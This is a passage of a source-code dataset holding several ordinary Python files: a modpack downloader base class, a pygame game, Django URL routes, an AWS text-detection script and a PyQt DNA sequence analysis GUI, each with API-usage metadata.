"matplotlib.pyplot", "line_number": 189, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 190, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 190, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 191, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 192, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 192, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 193, "usage_type": "name"}]} {"seq_id": "244304794", "text": "from abc import ABC, abstractmethod\nimport os\nimport urllib.request\nimport io\nimport os\n\nclass AbstractModpack(ABC):\n __slots__=('title','description')\n @abstractmethod\n def __init__(self, slug, title, summary, description):\n self.slug = slug\n self.title = title\n self.summary = summary\n self.description = description\n self._on_disk_path = 
os.path.expanduser('~/.local/share/minefish/'+slug)\n os.makedirs(self._on_disk_path, exist_ok=True)\n\n def _getimage(self, imagetype):\n \"\"\"\n Read from disk and return an image.\n :param imagetype: should be one of either 'icon' or 'background', but may be any legal filename\n :return: a PIL.Image, if we are able, or None if we are not\n \"\"\"\n try:\n from PIL import Image\n except ImportError:\n return None\n candidates = [x for x in os.listdir(self._on_disk_path) if x.startswith(imagetype+os.path.extsep)]\n if candidates:\n return Image.open(os.path.join(self._on_disk_path, candidates[0]))\n else:\n image_bytes, image_extension = self._get_image_bytes(imagetype)\n if not image_bytes:\n return None\n image = Image.open(io.BytesIO(image_bytes)) # if this fails we shouldn't be saving it to disk anyway.\n if image_extension:\n with open(os.path.join(self._on_disk_path, imagetype+os.path.extsep+image_extension), 'wb') as f:\n f.write(image_bytes)\n return image\n\n @abstractmethod\n def _get_image_bytes(self, image_type):\n \"\"\"Return a 2-tuple of a bytes object containing the contents of an image file, which will be written to disk\n by the caller, and a file extension without the leading dot. image_type will be one of either \"icon\",\n in which case you should return a small image suitable for displaying next to the modpack name and details in\n the pack list, or \"background\", in which case return a larger image suitable for displaying behind the\n modpack's detailedinfo. In case you cannot return an image, return a 2-tuple (None, None).\n If you do not want the file to be cached to disk (for example, because it was sourced from the executable),\n return a bytes object and None as the extension.\n\n It is up to the implementation to make sense (or not) of alternate values for image_type; the stock UI will\n never call get_image() with anything other than those two values, although third party code may. 
If you don't\n know what to do, return (None,None).\n \"\"\"\n return (None, None)\n\n\n def download(self, version:str=None):\n \"\"\"\n Download the modpack from whatever server using whatever means you find most suitable.\n :param version: Optional parameter specifying one element from the list returned by getVersionList(),\n or None (or omitted) for the latest version.\n :return: None\n \"\"\"\n pass\n\n @abstractmethod\n def _download(self, version:str=None):\n \"\"\"\n Take a version string and return an iterator in Swordfish CSV format specifying to the downloader what to do.\n The Swordfish CSV format is highly flexible but in case it is insufficient this method may have side effects.\n\n :param version:\n :return: An iterator following the sfpds CSV format.\n \"\"\"\n\n @abstractmethod\n def getVersions(self):\n return []\n\n\n", "sub_path": "swordfish_launcher/downloader/modpack.py", "file_name": "modpack.py", "file_ext": "py", "file_size_in_byte": 3509, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "abc.ABC", "line_number": 7, "usage_type": "name"}, {"api_name": "os.path.expanduser", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 16, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 9, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 30, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 30, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 35, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 35, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 41, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 67, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 77, "usage_type": "name"}]} {"seq_id": "37639442", "text": "# Gello game\n# Created by djengineer 2018-2020\n\nimport pygame\nimport time\nfrom random import randint\n\npygame.init()\npygame.font.init()\nscreenwidth = 1024\nscreenheight = 500\nsize = (screenwidth,screenheight)\nscreen = pygame.display.set_mode(size)\nbgcolor = (255,255,255)\npygame.display.set_caption(\"move and bounce a ball\")\n\n# Initialize variables\n########## initialize all button states ##########\nis_key_pressed = {\"up\" : False,\"down\" : False,\"left\" : False,\"right\" : False}\nfinished = False\nstart = False\nmain_menu = True\ngame_over = False\n\n#initialize functions here\ndef listen_key_press():\n global start\n global main_menu\n global game_over\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n start = not start\n main_menu = not main_menu\n if game_over == True:\n game_over = not game_over\n main_menu = True\n start = False\n if event.key == pygame.K_UP:\n is_key_pressed[\"up\"] = True\n if event.key == pygame.K_DOWN:\n is_key_pressed[\"down\"] = True\n if event.key == pygame.K_LEFT:\n 
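A note on the AbstractModpack record above: download() is currently a no-op wrapper, and the image and version methods are left abstract. The sketch below shows one way a concrete subclass could satisfy the _get_image_bytes contract of returning (bytes, extension) or (None, None); the class name, URL, and version list are hypothetical and not part of the original module, and the Swordfish CSV format is deliberately not invented here.

import urllib.request
from urllib.error import URLError

class ExampleModpack(AbstractModpack):  # assumes AbstractModpack from the record above is importable
    ICON_URL = 'https://example.invalid/icon.png'  # placeholder endpoint, not a real server

    def __init__(self):
        super().__init__('example-pack', 'Example Pack', 'A demo pack', 'Longer description text.')

    def _get_image_bytes(self, image_type):
        if image_type != 'icon':
            return (None, None)  # no background art in this sketch
        try:
            with urllib.request.urlopen(self.ICON_URL) as resp:
                # the caller caches these bytes to disk as icon.png
                return (resp.read(), 'png')
        except URLError:
            return (None, None)

    def _download(self, version=None):
        # the Swordfish CSV format is unspecified in this file, so the
        # sketch yields no rows rather than inventing the format
        return iter(())

    def getVersions(self):
        return ['1.0.0']  # hypothetical single release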
is_key_pressed[\"left\"] = True\n if event.key == pygame.K_RIGHT:\n is_key_pressed[\"right\"] = True\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_UP:\n is_key_pressed[\"up\"] = False\n if event.key == pygame.K_DOWN:\n is_key_pressed[\"down\"] = False\n if event.key == pygame.K_LEFT:\n is_key_pressed[\"left\"] = False\n if event.key == pygame.K_RIGHT:\n is_key_pressed[\"right\"] = False\n\n\n\n#initialize class here\nclass enemy:\n def __init__(self,name,speed,color,position,width):\n self.name = name\n self.speed = speed\n self.color = color\n self.position = position\n self.width = width\n self.direction = self.set_dir()\n def set_dir(self):\n #instead of lists, we use a dictionary here\n move_direction = {\"X\":randint(-self.speed,self.speed),\"Y\":randint(-self.speed,self.speed)}\n while move_direction[\"X\"] == 0 and move_direction[\"Y\"] == 0:\n move_direction = {\"X\":randint(-self.speed,self.speed),\"Y\":randint(-self.speed,self.speed)}\n return move_direction\n def movement_controller(self):\n if self.position[0] < screenwidth and self.position[0] > 0 and self.position[1] < screenheight and self.position[1] > 0:\n self.position[0] += self.direction[\"X\"]\n self.position[1] += self.direction[\"Y\"]\n self.boundary_controller()\n def boundary_controller(self):\n if self.position[0] <= 0: #left screen boundary\n #print(\"Left Bound\")\n self.position[0] += 5\n self.position[1] += 0\n self.direction = self.set_dir()\n if self.position[0] >= screenwidth: #right screen boundary\n #print(\"Right Bound\")\n self.position[0] -= 5\n self.position[1] -= 5\n self.direction = self.set_dir()\n if self.position[1] <= 0: #top screen boundary\n #print(\"Top Bound\")\n self.position[0] += 0\n self.position[1] += 5\n self.direction = self.set_dir()\n if self.position[1] >= screenheight: #bottom screen boundary\n #print(\"Bottom Bound\")\n self.position[0] -= 5\n self.position[1] -= 5\n self.direction = self.set_dir()\n def draw(self):\n pygame.draw.circle(screen,self.color,self.position, self.width, 0)\n def collision_detection(self):\n global game_over\n global start\n #Assuming single player only. Need more loops like enemy ball if more than one player\n #if abs(p1.position[0] - self.position[0] < self.width > 0) and abs(p1.position[1] - self.position[1] < self.width > 0):\n # print(self.name+\" Collide\")\n x = abs(p1.position[0] - self.position[0])\n y = abs(p1.position[1] - self.position[1])\n if x < self.width > 0 and y < self.width > 0:\n #reset coordinate of this collided ball, if not game cannot continue\n #self.position = [randint(0,screenwidth),randint(0,screenheight)]\n self.position = [screenwidth,screenheight]\n game_over = True\n start = False\n def all_play_functions(self):\n self.draw()\n self.movement_controller()\n self.boundary_controller()\n self.collision_detection()\n\n\nclass player:\n def __init__(self,name,position,color,width,speed):\n self.name = name\n self.position = position\n self.color = color\n self.width = width\n self.speed = speed\n def draw(self):\n pygame.draw.circle(screen,self.color,self.position, self.width, 0)\n def ball_movement_controller(self):\n # pygame's position starts from the TOP LEFT of the screen surface at (0,0)\n # X +1 will move it rightwards. How about X -1?\n # Y +1 will move it downwards. 
How about Y -1?\n # when up key pressed, y-coordinate -1 for as long as the key is pressed.\n if is_key_pressed[\"up\"] == True and self.position[1]>=0:\n self.position[1] -= self.speed\n if is_key_pressed[\"down\"] == True and self.position[1] <= screenheight:\n self.position[1] += self.speed\n if is_key_pressed[\"left\"] == True and self.position[0]>=0:\n self.position[0] -= self.speed\n if is_key_pressed[\"right\"] == True and self.position[0] <= screenwidth:\n self.position[0] += self.speed\n def all_player_functions(self):\n self.draw()\n self.ball_movement_controller()\n \n#load classes here\n#player\np1_ball_pos=[60,70]\np1_ball_color=(60,20,10)\np1_ball_width = 20\np1_ball_speed = 3\np1 = player(\"p1\",p1_ball_pos,p1_ball_color,p1_ball_width,p1_ball_speed)\n#enemy(name,speed,color,position,width,direction)\nenemy_count = 10\nmax_enemy_speed = 1\nenemy_obj_list = []\n\n\n# e1 starts at index 0\nfor x in range(0,enemy_count):\n width = 20\n color = (randint(0,255),randint(0,255),randint(0,255))\n position = [randint(0,screenwidth),randint(0,screenheight)]\n speed = randint(1,max_enemy_speed)\n enemy_obj_list.append(enemy(\"e\"+str(x+1),speed,color,position,width))\n\n\n##### Game Loop #####\nwhile finished == False:\n screen.fill(bgcolor)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n finished = True\n listen_key_press()\n if main_menu == True and start == False:\n headerfont = pygame.font.SysFont(\"monospace\", 30)\n title = headerfont.render(\"Press Space to Start\",1,(0,0,0))\n screen.blit(title,(100,80))\n if start == True and main_menu == False:\n ## Load Enemies in Game Loop\n for enemy in enemy_obj_list:\n enemy.all_play_functions()\n ## Load player 1 in Game Loop\n p1.all_player_functions()\n if game_over == True and start == False:\n headerfont = pygame.font.SysFont(\"monospace\", 30)\n title = headerfont.render(\"Game Over. 
Press Space to Main Menu.\",1,(0,0,0))\n screen.blit(title,(100,80))\n for enemy in enemy_obj_list:\n enemy.position = [screenheight,screenwidth];\n pygame.display.flip()\nwhile finished == True:\n pygame.quit()\n", "sub_path": "GelloGame.py", "file_name": "GelloGame.py", "file_ext": "py", "file_size_in_byte": 7262, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "pygame.init", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.font.init", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 13, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pygame.K_SPACE", "line_number": 31, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 42, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 48, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 54, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 70, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 72, "usage_type": "call"}, {"api_name": "pygame.draw.circle", "line_number": 101, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 101, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 131, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 131, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 165, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 166, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 167, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 174, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 174, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 175, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 179, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 179, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 189, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 189, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 194, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 194, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 196, "usage_type": "call"}]} {"seq_id": "259808208", "text": "\"\"\"\n\nThis module contains the urls for projects app. 
In the future, add any URL related to the projects app here.\n\n\"\"\"\nfrom django.conf.urls import url\nfrom projects import views\n\nurlpatterns = [\n    url(r'^user_dashboard$', views.project_member_view, name='user_dashboard'),\n    url(r'^admin$', views.admin_projects_view, name='admin_projects'),\n    url(r'^admin/user_mgmt$', views.user_mgmt, name='user_mgmt'),\n    # Passing the project name as an argument to the view function\n    url(r'^admin/(\\w+)$', views.admin_projects_edit_view, name='admin_projects_edit'),\n    url(r'^admin/(\\w+)/info$', views.admin_projects_info_view, name='admin_projects_info'),\n    url(r'^admin/(\\w+)/project_activity$', views.admin_projects_activity, name='admin_project_activity'),\n    url(r'^admin/(\\w+)/edit_info$', views.admin_projects_edit_info, name='admin_projects_edit_info'),\n    url(r'^admin/(\\w+)/lst_member$', views.list_project_members, name='list_project_members'),\n    url(r'^admin/(\\w+)/add_member$', views.admin_projects_add_member, name='admin_projects_add_member'),\n    url(r'^admin/(\\w+)/(\\w+)$', views.admin_projects_edit_member, name='admin_projects_edit_member'),\n    url(r'^(\\w+)/info$', views.project_info_view, name='projects_info'),\n    url(r'^\\w+/metadata$', views.project_info_view, name='projects_metadata'),\n    # url(r'^\\w+/members$', views.project_view, name='projects_members'),\n\n]\n", "sub_path": "projects/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1390, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "projects.views.project_member_view", "line_number": 10, "usage_type": "attribute"}, {"api_name": "projects.views", "line_number": 10, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "projects.views.admin_projects_view", "line_number": 11, "usage_type": "attribute"}, {"api_name": "projects.views", "line_number": 11, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "projects.views.user_mgmt", "line_number": 12, "usage_type": "attribute"}, {"api_name": "projects.views", "line_number": 12, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "projects.views.admin_projects_edit_view", "line_number": 14, "usage_type": "attribute"}, {"api_name": "projects.views", "line_number": 14, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "projects.views.admin_projects_info_view", "line_number": 15, "usage_type": "attribute"}, {"api_name": "projects.views", "line_number": 15, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "projects.views.admin_projects_activity", "line_number": 16, "usage_type": "attribute"}, {"api_name": "projects.views", "line_number": 16, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "projects.views.admin_projects_edit_info", "line_number": 17, "usage_type": "attribute"}, {"api_name": "projects.views", "line_number": 17, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 18, "usage_type": "call"}, {"api_name": "projects.views.list_project_members", "line_number": 18, "usage_type": "attribute"}, {"api_name": "projects.views", "line_number": 18, "usage_type": 
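The comment in the urls.py record above notes that the project name captured by the unnamed group (\w+) in a pattern like r'^admin/(\w+)$' is passed positionally to the view. A minimal sketch of the receiving side; the parameter name and the response body are illustrative, since projects/views.py itself is not part of this record.

from django.http import HttpResponse

def admin_projects_edit_view(request, project_name):
    # project_name receives whatever (\w+) matched, e.g. 'demo' for /admin/demo
    return HttpResponse('Editing project: {}'.format(project_name))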
"name"}, {"api_name": "django.conf.urls.url", "line_number": 19, "usage_type": "call"}, {"api_name": "projects.views.admin_projects_add_member", "line_number": 19, "usage_type": "attribute"}, {"api_name": "projects.views", "line_number": 19, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 20, "usage_type": "call"}, {"api_name": "projects.views.admin_projects_edit_member", "line_number": 20, "usage_type": "attribute"}, {"api_name": "projects.views", "line_number": 20, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 21, "usage_type": "call"}, {"api_name": "projects.views.project_info_view", "line_number": 21, "usage_type": "attribute"}, {"api_name": "projects.views", "line_number": 21, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 22, "usage_type": "call"}, {"api_name": "projects.views.project_info_view", "line_number": 22, "usage_type": "attribute"}, {"api_name": "projects.views", "line_number": 22, "usage_type": "name"}]} {"seq_id": "218732264", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# ライブラリをインポート\nimport time\nimport random\nimport boto3\n\n\ndef detect_text(image_path):\n \"\"\"\n AWSを使った画像中の文字を認識する関数\n \"\"\"\n \n # 画像認識の準備\n rekognition = boto3.client(service_name=\"rekognition\")\n with open(image_path, 'rb') as file:\n try:\n # 画像中から文字を認識\n detext_text_data = rekognition.detect_text(Image={'Bytes': file.read()})\n if len(detext_text_data[\"TextDetections\"]) != 0:\n # 認識結果から文字だけを取り出す\n text = detext_text_data[\"TextDetections\"][0][\"DetectedText\"]\n print(\"認識結果: {0}\".format(text))\n else:\n text = \"\"\n print(\"画像中に文字が検出されませんでした。\")\n except Exception as e:\n print(\"AWSが混み合っていますので、しばらくお待ちください。\")\n text = \"\"\n time.sleep(int(random.uniform(0, 5)))\n return text\n\nif __name__ == '__main__':\n # 画像のパス\n image_path = \"../img/forward.jpg\"\n # 画像中の文字を調べる\n text = detect_text(image_path)", "sub_path": "AISystem2/scripts/aws_detect_text.py", "file_name": "aws_detect_text.py", "file_ext": "py", "file_size_in_byte": 1261, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "boto3.client", "line_number": 16, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 31, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 31, "usage_type": "call"}]} {"seq_id": "250950706", "text": "\"\"\"\r\n--main Gui File--\r\n\r\nThe gui class creates the functionality for the gui.ui file.\r\n\r\nAllows a user to graphically import a seqence, analyze that seqence then\r\nrandomize as needed. 
Not very much error handling implemented so far.\r\n\r\nCurrently under development\r\n\r\n\"\"\"\r\n\r\n\r\n#Metadata\r\n__author__ = \"Scott Howes, Braeden Van Der Velde\"\r\n__credits__ = \"Scott Howes, Braeden Van Der Velde\"\r\n__email__ = \"showes@unbc.ca, velde@unbc.ca\"\r\n__python_version__ = \"3.9.0\"\r\n\r\n\r\n#imports\r\nimport sys\r\nimport os\r\nfrom seq_analyzer import seq_analyzer\r\nfrom seq_randomizer import seq_randomizer\r\nfrom Bio.SeqUtils import GC\r\nfrom Bio.Seq import Seq\r\nfrom PyQt5.QtWidgets import QFileDialog\r\nfrom PyQt5.QtWidgets import QTableWidgetItem\r\nfrom PyQt5.QtWidgets import QMessageBox\r\nfrom PyQt5.QtCore import pyqtSlot\r\nfrom PyQt5.QtCore import Qt\r\nfrom PyQt5.QtWidgets import QApplication\r\nfrom PyQt5.QtWidgets import QWidget\r\nfrom PyQt5.uic import loadUi\r\n\r\n\r\n#the seq_gui class\r\nclass seq_gui(QWidget):\r\n\r\n\r\n    #constructor\r\n    def __init__(self):\r\n        super(seq_gui, self).__init__()\r\n        loadUi(\"GUIs/gui.ui\", self)\r\n        self._load_connects()\r\n        self.move(20,20)\r\n        self.randomizer = seq_randomizer()\r\n\r\n\r\n    #loads the connection for the buttons\r\n    def _load_connects(self):\r\n\r\n        #bttn_create connects\r\n        self.bttn_openSeq.clicked.connect(self.bttn_openSeq_clicked)\r\n        self.bttn_save.clicked.connect(self.bttn_save_clicked)\r\n        self.bttn_clearSeq.clicked.connect(self.bttn_clearSeq_clicked)\r\n        self.bttn_randomize.clicked.connect(self.bttn_randomize_clicked)\r\n        self.bttn_analyze.clicked.connect(self.bttn_analyze_clicked)\r\n\r\n\r\n    #creates the functionality for the Open button\r\n    @pyqtSlot()\r\n    def bttn_openSeq_clicked(self):\r\n        path, _ = QFileDialog.getOpenFileName(None, \"Load Sequence\", \"\", \"Text Files (*.txt)\")\r\n        if path:\r\n            file = open(path, \"r\")\r\n            contents = file.read()\r\n            self.textEdit_seq.setText(contents)\r\n\r\n\r\n    #creates the functionality for the Save button\r\n    @pyqtSlot()\r\n    def bttn_save_clicked(self):\r\n        path, _ = QFileDialog.getSaveFileName(None, \"Save Sequence\", \"\", \"*.txt\")\r\n        if path:\r\n            file = open(path, \"w+\")\r\n            contents = self.textEdit_seq.toPlainText()\r\n            file.write(contents)\r\n            file.close()\r\n\r\n\r\n    #creates the functionality for the clear button\r\n    @pyqtSlot()\r\n    def bttn_clearSeq_clicked(self):\r\n        self.textEdit_seq.clear()\r\n\r\n\r\n    #creates the functionality for the Randomize button\r\n    @pyqtSlot()\r\n    def bttn_randomize_clicked(self):\r\n\r\n        #getting the sequence\r\n        seq = self.textEdit_seq.toPlainText()\r\n\r\n        #making seq uppercase\r\n        seq = seq.upper()\r\n\r\n        #valid character check\r\n        if self._seqCheck(seq):\r\n\r\n            #getting the randomization percentage\r\n            randPercent = int(self.label_rand.text())\r\n\r\n            #getting amino chain from original sequence\r\n            proteinSeq = Seq(seq)\r\n            oldAminoChain = str(proteinSeq.translate())\r\n\r\n            #randomization process\r\n            newSeq = self.randomizer.randomize(seq, randPercent)\r\n\r\n            #getting new amino chain\r\n            newProteinSeq = Seq(newSeq)\r\n            newAminoChain = str(newProteinSeq.translate())\r\n\r\n            #comparing chains\r\n            #and updating textedit field and analyzing\r\n            if newAminoChain == oldAminoChain:\r\n                self.textEdit_seq.setText(newSeq)\r\n                self._analyzeSequence(newSeq)\r\n            else:\r\n                self._errorMessage(\"Amino Acid Chain Mismatch\")\r\n                self.textEdit_aminoSeq.setText(\"Amino Acid Chain Mismatch!\")\r\n\r\n        else:\r\n            #Error Message\r\n            self._errorMessage(\"Invalid Characters detected in Sequence.\")\r\n\r\n\r\n    #creates the functionality for the Analyze Sequence button\r\n    @pyqtSlot()\r\n    def 
bttn_analyze_clicked(self):\r\n\r\n        #getting the sequence from the text edit box\r\n        seq = self.textEdit_seq.toPlainText()\r\n\r\n        #making seq upper case\r\n        seq = seq.upper()\r\n\r\n        #checking for valid characters\r\n        if self._seqCheck(seq):\r\n            #calling private analysis functionality\r\n            self._analyzeSequence(seq)\r\n\r\n        else:\r\n            #Error Message\r\n            self._errorMessage(\"Invalid Characters detected in Sequence.\")\r\n\r\n\r\n    #This function does the analysis on the Sequence in textEdit_seq\r\n    def _analyzeSequence(self, sequence):\r\n\r\n        #getting sequence length and adding it to character count\r\n        self.label_charVal.setText(str(len(sequence)))\r\n\r\n        #getting GC richness using biopython\r\n        self.label_gcVal.setText(str(round(GC(sequence), 2)))\r\n\r\n        #getting Amino Acid composition\r\n        protein_seq = Seq(sequence)\r\n        self.textEdit_aminoSeq.setText(str(protein_seq.translate()))\r\n\r\n        #using seq_analyzer to mine Sequence, returns list of lists\r\n        substrings = seq_analyzer.mineSequence(self, sequence, int(self.label_minSubSize.text()), int(self.label_maxSubSize.text()), int(self.label_minOccVal.text()))\r\n\r\n        #filling the table\r\n        self._populateTable(substrings)\r\n\r\n\r\n    #populates the table_subString\r\n    def _populateTable(self, items):\r\n\r\n        #clearing the table\r\n        self.table_subString.setRowCount(0)\r\n\r\n        #row counter used when adding items\r\n        row = 0\r\n\r\n        #setting the row count to the number of items\r\n        self.table_subString.setRowCount(len(items))\r\n\r\n        #adding items\r\n        for strings in items:\r\n            self.table_subString.setItem(row , 0, QTableWidgetItem(str(strings[0])))\r\n            self.table_subString.setItem(row , 1, QTableWidgetItem(str(strings[1])))\r\n            self.table_subString.setItem(row , 2, QTableWidgetItem(str(strings[2])))\r\n            row = row + 1\r\n\r\n        #sorting items by % of sequence\r\n        self.table_subString.sortItems(2, Qt.DescendingOrder)\r\n\r\n\r\n    #Error Message function\r\n    #only parameter is a string which is the Message\r\n    def _errorMessage(self, message):\r\n        msg = QMessageBox()\r\n        msg.setWindowTitle(\"Error Message Box\")\r\n        msg.setIcon(QMessageBox.Warning)\r\n        msg.setText(\"----- AN ERROR HAS OCCURRED -----\")\r\n        msg.setInformativeText(message)\r\n        msg.exec()\r\n\r\n\r\n    #this function checks that a sequence is only composed of G's C's A's T's\r\n    #not very efficient but does the job\r\n    def _seqCheck(self, sequence):\r\n        validChars = \"GCAT\"\r\n        return all(chars in validChars for chars in sequence)\r\n", "sub_path": "src/seq_gui.py", "file_name": "seq_gui.py", "file_ext": "py", "file_size_in_byte": 6700, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 39, "usage_type": "name"}, {"api_name": "PyQt5.uic.loadUi", "line_number": 45, "usage_type": "call"}, {"api_name": "seq_randomizer.seq_randomizer", "line_number": 48, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog.getOpenFileName", "line_number": 65, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog", "line_number": 65, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 63, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog.getSaveFileName", "line_number": 75, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog", "line_number": 75, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 73, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 84, 
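The randomize handler in the seq_gui record above only accepts a shuffled sequence when Bio.Seq.translate() returns the same amino acid chain, i.e. when every substitution is a synonymous codon swap. A tiny standalone check of that invariant; the codons below are chosen purely for illustration.

from Bio.Seq import Seq

original = Seq('GCTTGTGAT')     # Ala-Cys-Asp
randomized = Seq('GCCTGCGAC')   # same protein, different codons

print(original.translate())     # ACD
print(randomized.translate())   # ACD
print(str(original.translate()) == str(randomized.translate()))  # True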
"usage_type": "call"}, {"api_name": "Bio.Seq.Seq", "line_number": 106, "usage_type": "call"}, {"api_name": "Bio.Seq.Seq", "line_number": 113, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 90, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 131, "usage_type": "call"}, {"api_name": "Bio.SeqUtils.GC", "line_number": 157, "usage_type": "call"}, {"api_name": "Bio.Seq.Seq", "line_number": 160, "usage_type": "call"}, {"api_name": "seq_analyzer.seq_analyzer.mineSequence", "line_number": 164, "usage_type": "call"}, {"api_name": "seq_analyzer.seq_analyzer", "line_number": 164, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 184, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 185, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 186, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.DescendingOrder", "line_number": 190, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 190, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 196, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.Warning", "line_number": 198, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 198, "usage_type": "name"}]} {"seq_id": "141842686", "text": "import argparse\nimport numpy as np\nimport os\nfrom utils_vae import img_tile, mnist_reader\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\n\ndef 